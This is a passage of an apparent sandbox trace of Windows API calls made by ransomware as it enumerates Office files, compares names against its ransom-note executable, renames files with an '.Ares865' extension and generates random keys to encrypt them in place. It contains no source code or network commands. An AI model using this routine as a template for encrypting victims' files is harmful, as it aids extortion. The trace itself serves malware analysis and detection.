dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.275] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.275] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c538200, ftCreationTime.dwHighDateTime=0x1c4a110, ftLastAccessTime.dwLowDateTime=0x6035c410, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c538200, ftLastWriteTime.dwHighDateTime=0x1c4a110, nFileSizeHigh=0x0, nFileSizeLow=0x62f96, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CATWIZ.POC", cAlternateFileName="")) returned 1 [0067.275] lstrcmpiW (lpString1="CATWIZ.POC", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.276] lstrcmpiW (lpString1="CATWIZ.POC", lpString2="aoldtz.exe") returned 1 [0067.276] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CERT.XML.Ares865") returned 66 [0067.276] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CERT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\cert.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CERT.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\cert.xml.ares865"), dwFlags=0x1) returned 1 [0067.277] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CERT.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\cert.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0067.277] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5898) returned 1 [0067.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.277] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.278] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.278] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.278] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.278] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a10, lpName=0x0) returned 0x154 [0067.280] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a10) returned 0x190000 [0067.281] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.282] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.282] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.282] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.282] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.283] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.283] CloseHandle (hObject=0x154) returned 1 [0067.283] CloseHandle (hObject=0x15c) returned 1 [0067.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.283] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.283] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eb5dc00, ftCreationTime.dwHighDateTime=0x1c4a110, ftLastAccessTime.dwLowDateTime=0x60382570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1eb5dc00, ftLastWriteTime.dwHighDateTime=0x1c4a110, nFileSizeHigh=0x0, nFileSizeLow=0x11b82, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CERT98.POC", cAlternateFileName="")) returned 1 [0067.283] lstrcmpiW (lpString1="CERT98.POC", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.283] lstrcmpiW (lpString1="CERT98.POC", lpString2="aoldtz.exe") returned 1 [0067.283] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBAR.XML.Ares865") returned 70 [0067.283] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBAR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgaccbar.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBAR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgaccbar.xml.ares865"), dwFlags=0x1) returned 1 [0067.285] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBAR.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgaccbar.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0067.285] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2850) returned 1 [0067.285] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.285] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.285] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.285] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.286] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.286] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.286] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe30, lpName=0x0) returned 0x154 [0067.287] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe30) returned 0x190000 [0067.288] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.289] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.289] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.289] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.289] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.289] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.290] CloseHandle (hObject=0x154) returned 1 [0067.290] CloseHandle (hObject=0x15c) returned 1 [0067.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.290] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.290] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebf1300, ftCreationTime.dwHighDateTime=0x1c5d95d, ftLastAccessTime.dwLowDateTime=0x60760930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8ebf1300, ftLastWriteTime.dwHighDateTime=0x1c5d95d, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGACCBOX.DPV", cAlternateFileName="")) returned 1 [0067.290] lstrcmpiW (lpString1="DGACCBOX.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.290] lstrcmpiW (lpString1="DGACCBOX.DPV", lpString2="aoldtz.exe") returned 1 [0067.290] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBOX.XML.Ares865") returned 70 [0067.290] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBOX.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgaccbox.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBOX.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgaccbox.xml.ares865"), dwFlags=0x1) returned 1 [0067.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBOX.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgaccbox.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0067.291] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=846) returned 1 [0067.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.291] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.292] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.292] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.292] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x650, lpName=0x0) returned 0x154 [0067.294] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x650) returned 0x190000 [0067.294] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.295] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.295] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.295] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.295] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.295] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.296] CloseHandle (hObject=0x154) returned 1 [0067.296] CloseHandle (hObject=0x15c) returned 1 [0067.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.296] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.296] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe82ce100, ftCreationTime.dwHighDateTime=0x1c5ffa1, ftLastAccessTime.dwLowDateTime=0x60760930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe82ce100, ftLastWriteTime.dwHighDateTime=0x1c5ffa1, nFileSizeHigh=0x0, nFileSizeLow=0x4b2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGAD.DPV", cAlternateFileName="")) returned 1 [0067.296] lstrcmpiW (lpString1="DGAD.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.296] lstrcmpiW (lpString1="DGAD.DPV", lpString2="aoldtz.exe") returned 1 [0067.296] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGAD.XML.Ares865") returned 66 [0067.296] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGAD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgad.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGAD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgad.xml.ares865"), dwFlags=0x1) returned 1 [0067.297] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGAD.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgad.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0067.297] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=958) returned 1 [0067.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.298] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.298] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.298] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.298] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.298] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.298] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c0, lpName=0x0) returned 0x154 [0067.300] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c0) returned 0x190000 [0067.300] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.301] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.301] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.301] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.301] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.301] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.301] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.301] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.301] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.302] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.302] CloseHandle (hObject=0x154) returned 1 [0067.302] CloseHandle (hObject=0x15c) returned 1 [0067.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.302] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.302] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92fc900, ftCreationTime.dwHighDateTime=0x1c7e8c2, ftLastAccessTime.dwLowDateTime=0x51da7910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc92fc900, ftLastWriteTime.dwHighDateTime=0x1c7e8c2, nFileSizeHigh=0x0, nFileSizeLow=0x5269, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGATNGET.DPV", cAlternateFileName="")) returned 1 [0067.302] lstrcmpiW (lpString1="DGATNGET.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.302] lstrcmpiW (lpString1="DGATNGET.DPV", lpString2="aoldtz.exe") returned 1 [0067.302] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGATNGET.XML.Ares865") returned 70 [0067.302] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGATNGET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgatnget.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGATNGET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgatnget.xml.ares865"), dwFlags=0x1) returned 1 [0067.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGATNGET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgatnget.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0067.303] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5210) returned 1 [0067.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.303] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.303] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0067.304] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0067.304] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.304] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1760, lpName=0x0) returned 0x154 [0067.306] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1760) returned 0x190000 [0067.307] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0067.307] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0067.307] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.307] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.307] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.308] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0067.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0067.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.308] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.308] CloseHandle (hObject=0x154) returned 1 [0067.308] CloseHandle (hObject=0x15c) returned 1 [0067.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.308] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.309] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98487b00, ftCreationTime.dwHighDateTime=0x1c5d95d, ftLastAccessTime.dwLowDateTime=0x60760930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x98487b00, ftLastWriteTime.dwHighDateTime=0x1c5d95d, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DGBARBLL.DPV", cAlternateFileName="")) returned 1 [0067.309] lstrcmpiW (lpString1="DGBARBLL.DPV", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0067.309] lstrcmpiW (lpString1="DGBARBLL.DPV", lpString2="aoldtz.exe") returned 1 [0067.309] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBARBLL.XML.Ares865") returned 70 [0067.309] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBARBLL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgbarbll.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBARBLL.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgbarbll.xml.ares865"), dwFlags=0x1) returned 1 [0067.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBARBLL.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgbarbll.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0067.389] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 